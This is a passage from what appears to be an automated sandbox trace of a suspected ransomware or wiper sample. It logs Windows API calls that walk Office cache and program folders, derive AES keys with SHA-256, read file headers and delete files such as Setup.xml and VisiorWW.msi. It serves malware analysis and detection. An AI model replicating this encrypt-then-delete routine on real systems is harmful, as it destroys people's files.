lpUsedDefaultChar=0x0) returned 10 [0134.980] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0134.980] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0134.981] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0134.981] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0134.981] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0134.981] GetFileSize (in: hFile=0x3e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5061 [0134.981] ReadFile (in: hFile=0x3e0, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0134.985] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0134.985] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0134.985] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0134.986] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0134.987] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VisiorWW.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisiorWW.cab", lpUsedDefaultChar=0x0) returned 13 [0134.987] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VisiorWW.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisiorWW.msi", lpUsedDefaultChar=0x0) returned 13 [0134.988] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0134.989] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0134.989] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0134.989] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0134.989] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb80800 [0134.989] ReadFile (in: hFile=0x3dc, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0137.463] CryptDestroyHash (hHash=0x284d528) returned 1 [0137.463] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0137.463] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0137.464] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi")) returned 1 [0137.470] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0137.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VisiorWW.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisiorWW.xml", lpUsedDefaultChar=0x0) returned 13 [0137.470] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0137.471] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0137.471] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0137.471] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0137.471] GetFileSize (in: hFile=0x3e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2213 [0137.471] ReadFile (in: hFile=0x3e0, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0137.492] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0137.492] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0137.492] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0137.494] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 1 [0137.495] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0137.495] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0137.495] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0137.495] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0137.495] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 0 [0137.495] FindClose (in: hFindFile=0x284d3a8 | out: hFindFile=0x284d3a8) returned 1 [0137.495] FindNextFileW (in: hFindFile=0x284d468, lpFindFileData=0x326ea18 | out: lpFindFileData=0x326ea18) returned 1 [0137.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pagefile.sys", cchWideChar=-1, lpMultiByteStr=0x326f520, cbMultiByte=260, lpDefaultChar=0x326ecff, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pagefile.sys", lpUsedDefaultChar=0x0) returned 13 [0137.495] FindNextFileW (in: hFindFile=0x284d468, lpFindFileData=0x326ea18 | out: lpFindFileData=0x326ea18) returned 1 [0137.496] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.496] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0137.496] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0137.496] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.496] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0137.496] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0137.496] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0137.496] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 0 [0137.496] FindClose (in: hFindFile=0x284d3a8 | out: hFindFile=0x284d3a8) returned 1 [0137.496] FindNextFileW (in: hFindFile=0x284d468, lpFindFileData=0x326ea18 | out: lpFindFileData=0x326ea18) returned 1 [0137.496] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.496] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0137.496] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0137.497] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.497] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0137.497] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0137.497] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.497] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0137.497] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0137.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSADDNDR.DLL", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSADDNDR.DLL", lpUsedDefaultChar=0x0) returned 13 [0137.497] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0137.497] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0137.497] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0137.497] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.497] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0137.497] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0137.499] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.499] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.499] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DBGHELP.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBGHELP.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.499] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DW20.EXE", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DW20.EXE", lpUsedDefaultChar=0x0) returned 9 [0137.499] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DWTRIG20.EXE", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DWTRIG20.EXE", lpUsedDefaultChar=0x0) returned 13 [0137.500] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0137.500] FindClose (in: hFindFile=0x284d528 | out: hFindFile=0x284d528) returned 1 [0137.500] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0137.500] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.500] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.500] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.501] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.501] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.501] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EEINTL.DLL", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEINTL.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.501] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0137.501] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0137.501] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EQNEDT32.CNT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EQNEDT32.CNT", lpUsedDefaultChar=0x0) returned 13 [0137.501] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EQNEDT32.EXE", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EQNEDT32.EXE", lpUsedDefaultChar=0x0) returned 13 [0137.501] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eqnedt32.exe.manifest", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eqnedt32.exe.manifest", lpUsedDefaultChar=0x0) returned 22 [0137.502] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EQNEDT32.HLP", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EQNEDT32.HLP", lpUsedDefaultChar=0x0) returned 13 [0137.502] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MTEXTRA.TTF", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MTEXTRA.TTF", lpUsedDefaultChar=0x0) returned 12 [0137.502] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0137.502] FindClose (in: hFindFile=0x284d528 | out: hFindFile=0x284d528) returned 1 [0137.502] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0137.503] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.503] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.503] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSOEURO.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOEURO.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.503] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0137.503] FindClose (in: hFindFile=0x284d528 | out: hFindFile=0x284d528) returned 1 [0137.503] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0137.504] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.504] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.504] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="msgfilt.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msgfilt.dll", lpUsedDefaultChar=0x0) returned 12 [0137.504] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="odffilt.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="odffilt.dll", lpUsedDefaultChar=0x0) returned 12 [0137.504] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="offfiltx.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="offfiltx.dll", lpUsedDefaultChar=0x0) returned 13 [0137.504] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VISFILT.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISFILT.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.504] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0137.504] FindClose (in: hFindFile=0x284d528 | out: hFindFile=0x284d528) returned 1 [0137.505] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0137.520] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CGMIMP32.CFG", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CGMIMP32.CFG", lpUsedDefaultChar=0x0) returned 13 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CGMIMP32.FLT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CGMIMP32.FLT", lpUsedDefaultChar=0x0) returned 13 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CGMIMP32.FNT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CGMIMP32.FNT", lpUsedDefaultChar=0x0) returned 13 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EPSIMP32.FLT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EPSIMP32.FLT", lpUsedDefaultChar=0x0) returned 13 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GIFIMP32.FLT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GIFIMP32.FLT", lpUsedDefaultChar=0x0) returned 13 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="JPEGIM32.FLT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JPEGIM32.FLT", lpUsedDefaultChar=0x0) returned 13 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MS.CGM", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.CGM", lpUsedDefaultChar=0x0) returned 7 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MS.EPS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.EPS", lpUsedDefaultChar=0x0) returned 7 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MS.GIF", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.GIF", lpUsedDefaultChar=0x0) returned 7 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MS.JPG", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.JPG", lpUsedDefaultChar=0x0) returned 7 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MS.PNG", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.PNG", lpUsedDefaultChar=0x0) returned 7 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MS.WPG", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WPG", lpUsedDefaultChar=0x0) returned 7 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PICTIM32.FLT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PICTIM32.FLT", lpUsedDefaultChar=0x0) returned 13 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PNG32.FLT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PNG32.FLT", lpUsedDefaultChar=0x0) returned 10 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WPGIMP32.FLT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WPGIMP32.FLT", lpUsedDefaultChar=0x0) returned 13 [0137.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0137.521] FindClose (in: hFindFile=0x284d528 | out: hFindFile=0x284d528) returned 1 [0137.522] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0137.522] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.522] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.522] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="hxds.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hxds.dll", lpUsedDefaultChar=0x0) returned 9 [0137.522] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ITIRCL55.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ITIRCL55.DLL", lpUsedDefaultChar=0x0) returned 13 [0137.522] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="msitss55.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, 